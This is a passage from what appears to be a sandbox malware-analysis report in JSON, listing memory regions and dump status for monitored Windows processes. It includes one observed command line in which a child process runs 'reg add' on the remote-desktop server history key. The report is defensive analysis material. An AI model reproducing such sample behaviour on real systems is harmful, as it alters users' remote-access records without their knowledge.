"memory_mapped_file", "start_va": 262144, "timestamp": "00:08:11.467", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 327680, "type": "region", "version": 1 }, "end_va": 344063, "entry_point": 0, "filename": null, "id": "region_1359", "name": "pagefile_0x0000000000050000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 327680, "timestamp": "00:08:11.470", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 393216, "type": "region", "version": 1 }, "end_va": 397311, "entry_point": 0, "filename": null, "id": "region_1360", "name": "pagefile_0x0000000000060000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 393216, "timestamp": "00:08:11.470", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001361-addr_0x0000000000070000-size_0x0000000000040000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_823", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 458752, "type": "region", "version": 1 }, "end_va": 720895, "entry_point": 0, "filename": null, "id": "region_1361", "name": "private_0x0000000000070000", "norm_filename": null, "region_type": "private_memory", "start_va": 458752, "timestamp": "00:08:11.471", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001362-addr_0x00000000000b0000-size_0x0000000000040000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_824", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 720896, "type": "region", "version": 1 }, "end_va": 983039, "entry_point": 0, "filename": null, "id": "region_1362", "name": "private_0x00000000000b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 720896, "timestamp": "00:08:11.471", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 335872, "start_va": 4587520, "type": "region", "version": 1 }, "end_va": 4923391, "entry_point": 4594634, "filename": "\\Windows\\SysWOW64\\reg.exe", "id": "region_1363", "name": "reg.exe", "norm_filename": "c:\\windows\\syswow64\\reg.exe", "region_type": "memory_mapped_file", "start_va": 4587520, "timestamp": "00:08:11.473", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1740800, "start_va": 1996357632, "type": "region", "version": 1 }, "end_va": 1998098431, "entry_point": 1996357632, "filename": "\\Windows\\System32\\ntdll.dll", "id": "region_1364", "name": "ntdll.dll", "norm_filename": "c:\\windows\\system32\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 1996357632, "timestamp": "00:08:11.475", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1572864, "start_va": 1998323712, "type": "region", "version": 1 }, "end_va": 1999896575, "entry_point": 1998323712, "filename": "\\Windows\\SysWOW64\\ntdll.dll", "id": "region_1365", "name": "ntdll.dll", "norm_filename": "c:\\windows\\syswow64\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 1998323712, "timestamp": "00:08:11.477", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 143360, "start_va": 2130378752, "type": "region", "version": 1 }, "end_va": 2130522111, "entry_point": 0, "filename": null, "id": "region_1366", "name": "pagefile_0x000000007efb0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2130378752, "timestamp": "00:08:11.478", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001367-addr_0x000000007efdb000-size_0x0000000000003000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_825", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 12288, "start_va": 2130554880, "type": "region", "version": 1 }, "end_va": 2130567167, "entry_point": 0, "filename": null, "id": "region_1367", "name": "private_0x000000007efdb000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130554880, "timestamp": "00:08:11.478", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001368-addr_0x000000007efde000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_826", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2130567168, "type": "region", "version": 1 }, "end_va": 2130571263, "entry_point": 0, "filename": null, "id": "region_1368", "name": "private_0x000000007efde000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130567168, "timestamp": "00:08:11.479", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001369-addr_0x000000007efdf000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_827", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2130571264, "type": "region", "version": 1 }, "end_va": 2130575359, "entry_point": 0, "filename": null, "id": "region_1369", "name": "private_0x000000007efdf000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130571264, "timestamp": "00:08:11.479", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16777216, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_1370", "name": "private_0x000000007efe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130575360, "timestamp": "00:08:11.479", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001371-addr_0x000000007ffe0000-size_0x0000000000010000-perm_r.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable" ], "ref_process_dump": { "ref_id": "proc_dump_828", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 2147352576, "type": "region", "version": 1 }, "end_va": 2147418111, "entry_point": 0, "filename": null, "id": "region_1371", "name": "private_0x000000007ffe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147352576, "timestamp": "00:08:11.480", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "ignored_region" ], "info": "No dump was created because this is an ignored region", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8793945538560, "start_va": 2147418112, "type": "region", "version": 1 }, "end_va": 8796092956671, "entry_point": 0, "filename": null, "id": "region_1372", "name": "private_0x000000007fff0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147418112, "timestamp": "00:08:11.480", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001373-addr_0x0000000000140000-size_0x0000000000080000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_829", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 524288, "start_va": 1310720, "type": "region", "version": 1 }, "end_va": 1835007, "entry_point": 0, "filename": null, "id": "region_1373", "name": "private_0x0000000000140000", "norm_filename": null, "region_type": "private_memory", "start_va": 1310720, "timestamp": "00:08:11.497", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 376832, "start_va": 1936785408, "type": "region", "version": 1 }, "end_va": 1937162239, "entry_point": 1937045400, "filename": "\\Windows\\System32\\wow64win.dll", "id": "region_1374", "name": "wow64win.dll", "norm_filename": "c:\\windows\\system32\\wow64win.dll", "region_type": "memory_mapped_file", "start_va": 1936785408, "timestamp": "00:08:11.499", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 258048, "start_va": 1937178624, "type": "region", "version": 1 }, "end_va": 1937436671, "entry_point": 1937366648, "filename": "\\Windows\\System32\\wow64.dll", "id": "region_1375", "name": "wow64.dll", "norm_filename": "c:\\windows\\system32\\wow64.dll", "region_type": "memory_mapped_file", "start_va": 1937178624, "timestamp": "00:08:11.501", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 32768, "start_va": 1937506304, "type": "region", "version": 1 }, "end_va": 1937539071, "entry_point": 1937514744, "filename": "\\Windows\\System32\\wow64cpu.dll", "id": "region_1376", "name": "wow64cpu.dll", "norm_filename": "c:\\windows\\system32\\wow64cpu.dll", "region_type": "memory_mapped_file", "start_va": 1937506304, "timestamp": "00:08:11.503", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 131071, "entry_point": 0, "filename": null, "id": "region_1377", "name": "pagefile_0x0000000000010000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 65536, "timestamp": "00:08:11.522", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_1378", "name": "pagefile_0x0000000000020000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 131072, "timestamp": "00:08:11.522", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001379-addr_0x0000000000210000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_830", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 2162688, "type": "region", "version": 1 }, "end_va": 3211263, "entry_point": 0, "filename": null, "id": "region_1379", "name": "private_0x0000000000210000", "norm_filename": null, "region_type": "private_memory", "start_va": 2162688, "timestamp": "00:08:11.523", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 421888, "start_va": 3211264, "type": "region", "version": 1 }, "end_va": 3633151, "entry_point": 3211264, "filename": "\\Windows\\System32\\locale.nls", "id": "region_1380", "name": "locale.nls", "norm_filename": "c:\\windows\\system32\\locale.nls", "region_type": "memory_mapped_file", "start_va": 3211264, "timestamp": "00:08:11.524", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001381-addr_0x0000000000690000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_831", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 6881280, "type": "region", "version": 1 }, "end_va": 6946815, "entry_point": 0, "filename": null, "id": "region_1381", "name": "private_0x0000000000690000", "norm_filename": null, "region_type": "private_memory", "start_va": 6881280, "timestamp": "00:08:11.525", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 49152, "start_va": 1959854080, "type": "region", "version": 1 }, "end_va": 1959903231, "entry_point": 1959858401, "filename": "\\Windows\\SysWOW64\\cryptbase.dll", "id": "region_1382", "name": "cryptbase.dll", "norm_filename": "c:\\windows\\syswow64\\cryptbase.dll", "region_type": "memory_mapped_file", "start_va": 1959854080, "timestamp": "00:08:11.527", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 393216, "start_va": 1959919616, "type": "region", "version": 1 }, "end_va": 1960312831, "entry_point": 1960027059, "filename": "\\Windows\\SysWOW64\\sspicli.dll", "id": "region_1383", "name": "sspicli.dll", "norm_filename": "c:\\windows\\syswow64\\sspicli.dll", "region_type": "memory_mapped_file", "start_va": 1959919616, "timestamp": "00:08:11.529", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 356352, "start_va": 1960312832, "type": "region", "version": 1 }, "end_va": 1960669183, "entry_point": 1960418214, "filename": "\\Windows\\SysWOW64\\shlwapi.dll", "id": "region_1384", "name": "shlwapi.dll", "norm_filename": "c:\\windows\\syswow64\\shlwapi.dll", "region_type": "memory_mapped_file", "start_va": 1960312832, "timestamp": "00:08:11.531", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1114112, "start_va": 1964244992, "type": "region", "version": 1 }, "end_va": 1965359103, "entry_point": 1964323539, "filename": "\\Windows\\SysWOW64\\kernel32.dll", "id": "region_1385", "name": "kernel32.dll", "norm_filename": "c:\\windows\\syswow64\\kernel32.dll", "region_type": "memory_mapped_file", "start_va": 1964244992, "timestamp": "00:08:11.533", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1048576, "start_va": 1965359104, "type": "region", "version": 1 }, "end_va": 1966407679, "entry_point": 1965471469, "filename": "\\Windows\\SysWOW64\\user32.dll", "id": "region_1386", "name": "user32.dll", "norm_filename": "c:\\windows\\syswow64\\user32.dll", "region_type": "memory_mapped_file", "start_va": 1965359104, "timestamp": "00:08:11.535", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 655360, "start_va": 1966800896, "type": "region", "version": 1 }, "end_va": 1967456255, "entry_point": 1966885349, "filename": "\\Windows\\SysWOW64\\advapi32.dll", "id": "region_1387", "name": "advapi32.dll", "norm_filename": "c:\\windows\\syswow64\\advapi32.dll", "region_type": "memory_mapped_file", "start_va": 1966800896, "timestamp": "00:08:11.537", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 643072, "start_va": 1967456256, "type": "region", "version": 1 }, "end_va": 1968099327, "entry_point": 1967669207, "filename": "\\Windows\\SysWOW64\\usp10.dll", "id": "region_1388", "name": "usp10.dll", "norm_filename": "c:\\windows\\syswow64\\usp10.dll", "region_type": "memory_mapped_file", "start_va": 1967456256, "timestamp": "00:08:11.539", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 40960, "start_va": 1968111616, "type": "region", "version": 1 }, "end_va": 1968152575, "entry_point": 1968125600, "filename": "\\Windows\\SysWOW64\\lpk.dll", "id": "region_1389", "name": "lpk.dll", "norm_filename": "c:\\windows\\syswow64\\lpk.dll", "region_type": "memory_mapped_file", "start_va": 1968111616, "timestamp": "00:08:11.541", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 704512, "start_va": 1968177152, "type": "region", "version": 1 }, "end_va": 1968881663, "entry_point": 1968219250, "filename": "\\Windows\\SysWOW64\\msvcrt.dll", "id": "region_1390", "name": "msvcrt.dll", "norm_filename": "c:\\windows\\syswow64\\msvcrt.dll", "region_type": "memory_mapped_file", "start_va": 1968177152, "timestamp": "00:08:11.543", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 24576, "start_va": 1970274304, "type": "region", "version": 1 }, "end_va": 1970298879, "entry_point": 1970280322, "filename": "\\Windows\\SysWOW64\\nsi.dll", "id": "region_1391", "name": "nsi.dll", "norm_filename": "c:\\windows\\syswow64\\nsi.dll", "region_type": "memory_mapped_file", "start_va": 1970274304, "timestamp": "00:08:11.545", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 983040, "start_va": 1971257344, "type": "region", "version": 1 }, "end_va": 1972240383, "entry_point": 1971324265, "filename": "\\Windows\\SysWOW64\\rpcrt4.dll", "id": "region_1392", "name": "rpcrt4.dll", "norm_filename": "c:\\windows\\syswow64\\rpcrt4.dll", "region_type": "memory_mapped_file", "start_va": 1971257344, "timestamp": "00:08:11.549", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 102400, "start_va": 1972240384, "type": "region", "version": 1 }, "end_va": 1972342783, "entry_point": 1972259189, "filename": "\\Windows\\SysWOW64\\sechost.dll", "id": "region_1393", "name": "sechost.dll", "norm_filename": "c:\\windows\\syswow64\\sechost.dll", "region_type": "memory_mapped_file", "start_va": 1972240384, "timestamp": "00:08:11.551", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 286720, "start_va": 1972371456, "type": "region", "version": 1 }, "end_va": 1972658175, "entry_point": 1972401272, "filename": "\\Windows\\SysWOW64\\KernelBase.dll", "id": "region_1394", "name": "kernelbase.dll", "norm_filename": "c:\\windows\\syswow64\\kernelbase.dll", "region_type": "memory_mapped_file", "start_va": 1972371456, "timestamp": "00:08:11.552", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 589824, "start_va": 1974140928, "type": "region", "version": 1 }, "end_va": 1974730751, "entry_point": 1974231875, "filename": "\\Windows\\SysWOW64\\gdi32.dll", "id": "region_1395", "name": "gdi32.dll", "norm_filename": "c:\\windows\\syswow64\\gdi32.dll", "region_type": "memory_mapped_file", "start_va": 1974140928, "timestamp": "00:08:11.554", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 217088, "start_va": 1974927360, "type": "region", "version": 1 }, "end_va": 1975144447, "entry_point": 1974932573, "filename": "\\Windows\\SysWOW64\\ws2_32.dll", "id": "region_1396", "name": "ws2_32.dll", "norm_filename": "c:\\windows\\syswow64\\ws2_32.dll", "region_type": "memory_mapped_file", "start_va": 1974927360, "timestamp": "00:08:11.555", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001397-addr_0x0000000076dc0000-size_0x00000000000fa000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_832", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1024000, "start_va": 1994129408, "type": "region", "version": 1 }, "end_va": 1995153407, "entry_point": 0, "filename": null, "id": "region_1397", "name": "private_0x0000000076dc0000", "norm_filename": null, "region_type": "private_memory", "start_va": 1994129408, "timestamp": "00:08:11.557", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001398-addr_0x0000000076ec0000-size_0x000000000011f000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_833", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1175552, "start_va": 1995177984, "type": "region", "version": 1 }, "end_va": 1996353535, "entry_point": 0, "filename": null, "id": "region_1398", "name": "private_0x0000000076ec0000", "norm_filename": null, "region_type": "private_memory", "start_va": 1995177984, "timestamp": "00:08:11.557", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1048576, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2131623935, "entry_point": 0, "filename": null, "id": "region_1399", "name": "pagefile_0x000000007efe0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2130575360, "timestamp": "00:08:11.557", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 15728640, "start_va": 2131623936, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_1400", "name": "private_0x000000007f0e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2131623936, "timestamp": "00:08:11.558", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1605632, "start_va": 4980736, "type": "region", "version": 1 }, "end_va": 6586367, "entry_point": 0, "filename": null, "id": "region_1401", "name": "pagefile_0x00000000004c0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 4980736, "timestamp": "00:08:11.562", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 393216, "start_va": 1966407680, "type": "region", "version": 1 }, "end_va": 1966800895, "entry_point": 1966478735, "filename": "\\Windows\\SysWOW64\\imm32.dll", "id": "region_1402", "name": "imm32.dll", "norm_filename": "c:\\windows\\syswow64\\imm32.dll", "region_type": "memory_mapped_file", "start_va": 1966407680, "timestamp": "00:08:11.564", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 835584, "start_va": 1970339840, "type": "region", "version": 1 }, "end_va": 1971175423, "entry_point": 1970345611, "filename": "\\Windows\\SysWOW64\\msctf.dll", "id": "region_1403", "name": "msctf.dll", "norm_filename": "c:\\windows\\syswow64\\msctf.dll", "region_type": "memory_mapped_file", "start_va": 1970339840, "timestamp": "00:08:11.566", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 28672, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 225279, "entry_point": 0, "filename": null, "id": "region_1404", "name": "pagefile_0x0000000000030000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 196608, "timestamp": "00:08:11.572", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 983040, "type": "region", "version": 1 }, "end_va": 991231, "entry_point": 0, "filename": null, "id": "region_1405", "name": "pagefile_0x00000000000f0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 983040, "timestamp": "00:08:11.572", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 36864, "start_va": 1048576, "type": "region", "version": 1 }, "end_va": 1085439, "entry_point": 1048576, "filename": "\\Windows\\SysWOW64\\en-US\\reg.exe.mui", "id": "region_1406", "name": "reg.exe.mui", "norm_filename": "c:\\windows\\syswow64\\en-us\\reg.exe.mui", "region_type": "memory_mapped_file", "start_va": 1048576, "timestamp": "00:08:11.573", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001407-addr_0x0000000000110000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_834", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 1114112, "type": "region", "version": 1 }, "end_va": 1118207, "entry_point": 0, "filename": null, "id": "region_1407", "name": "private_0x0000000000110000", "norm_filename": null, "region_type": "private_memory", "start_va": 1114112, "timestamp": "00:08:11.574", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001408-addr_0x0000000000120000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_835", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 1179648, "type": "region", "version": 1 }, "end_va": 1183743, "entry_point": 0, "filename": null, "id": "region_1408", "name": "private_0x0000000000120000", "norm_filename": null, "region_type": "private_memory", "start_va": 1179648, "timestamp": "00:08:11.574", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1576960, "start_va": 6946816, "type": "region", "version": 1 }, "end_va": 8523775, "entry_point": 0, "filename": null, "id": "region_1409", "name": "pagefile_0x00000000006a0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 6946816, "timestamp": "00:08:11.574", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 20971520, "start_va": 8585216, "type": "region", "version": 1 }, "end_va": 29556735, "entry_point": 0, "filename": null, "id": "region_1410", "name": "pagefile_0x0000000000830000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 8585216, "timestamp": "00:08:11.575", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 2945024, "start_va": 29556736, "type": "region", "version": 1 }, "end_va": 32501759, "entry_point": 29556736, "filename": "\\Windows\\Globalization\\Sorting\\SortDefault.nls", "id": "region_1411", "name": "sortdefault.nls", "norm_filename": "c:\\windows\\globalization\\sorting\\sortdefault.nls", "region_type": "memory_mapped_file", "start_va": 29556736, "timestamp": "00:08:11.577", "type": "region", "version": 1 } ], "terminate_reason": "terminated", "type": "monitored_process", "unmonitor_reason": "terminated_by_timeout", "version": 1 }, { "cmd_line": "reg add \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\"", "filename": "c:\\windows\\syswow64\\reg.exe", "id": "proc_9", "image_name": "reg.exe", "monitor_reason": "child_process", "monitored_id": 9, "origin_monitor_id": 5, "ref_parent_process": { "ref_id": "proc_5", "ref_source": "summary", "ref_type": "monitored_process", "type": "reference", "version": 1 }, "regions": [ { "dump": { "filename": "process_00000009-region_00001412-addr_0x0000000000010000-size_0x0000000000020000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_836", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 131072, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_1412", "name": "private_0x0000000000010000", "norm_filename": null, "region_type": "private_memory", "start_va": 65536, "timestamp": "00:08:11.604", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000009-region_00001413-addr_0x0000000000030000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_837", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 204799, "entry_point": 0, "filename": null, "id": "region_1413", "name": "private_0x0000000000030000", "norm_filename": null, "region_type": "private_memory", "start_va": 196608, "timestamp": "00:08:11.605", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 4096, "start_va": 262144, "type": "region", "version": 1 }, "end_va": 266239, "entry_point": 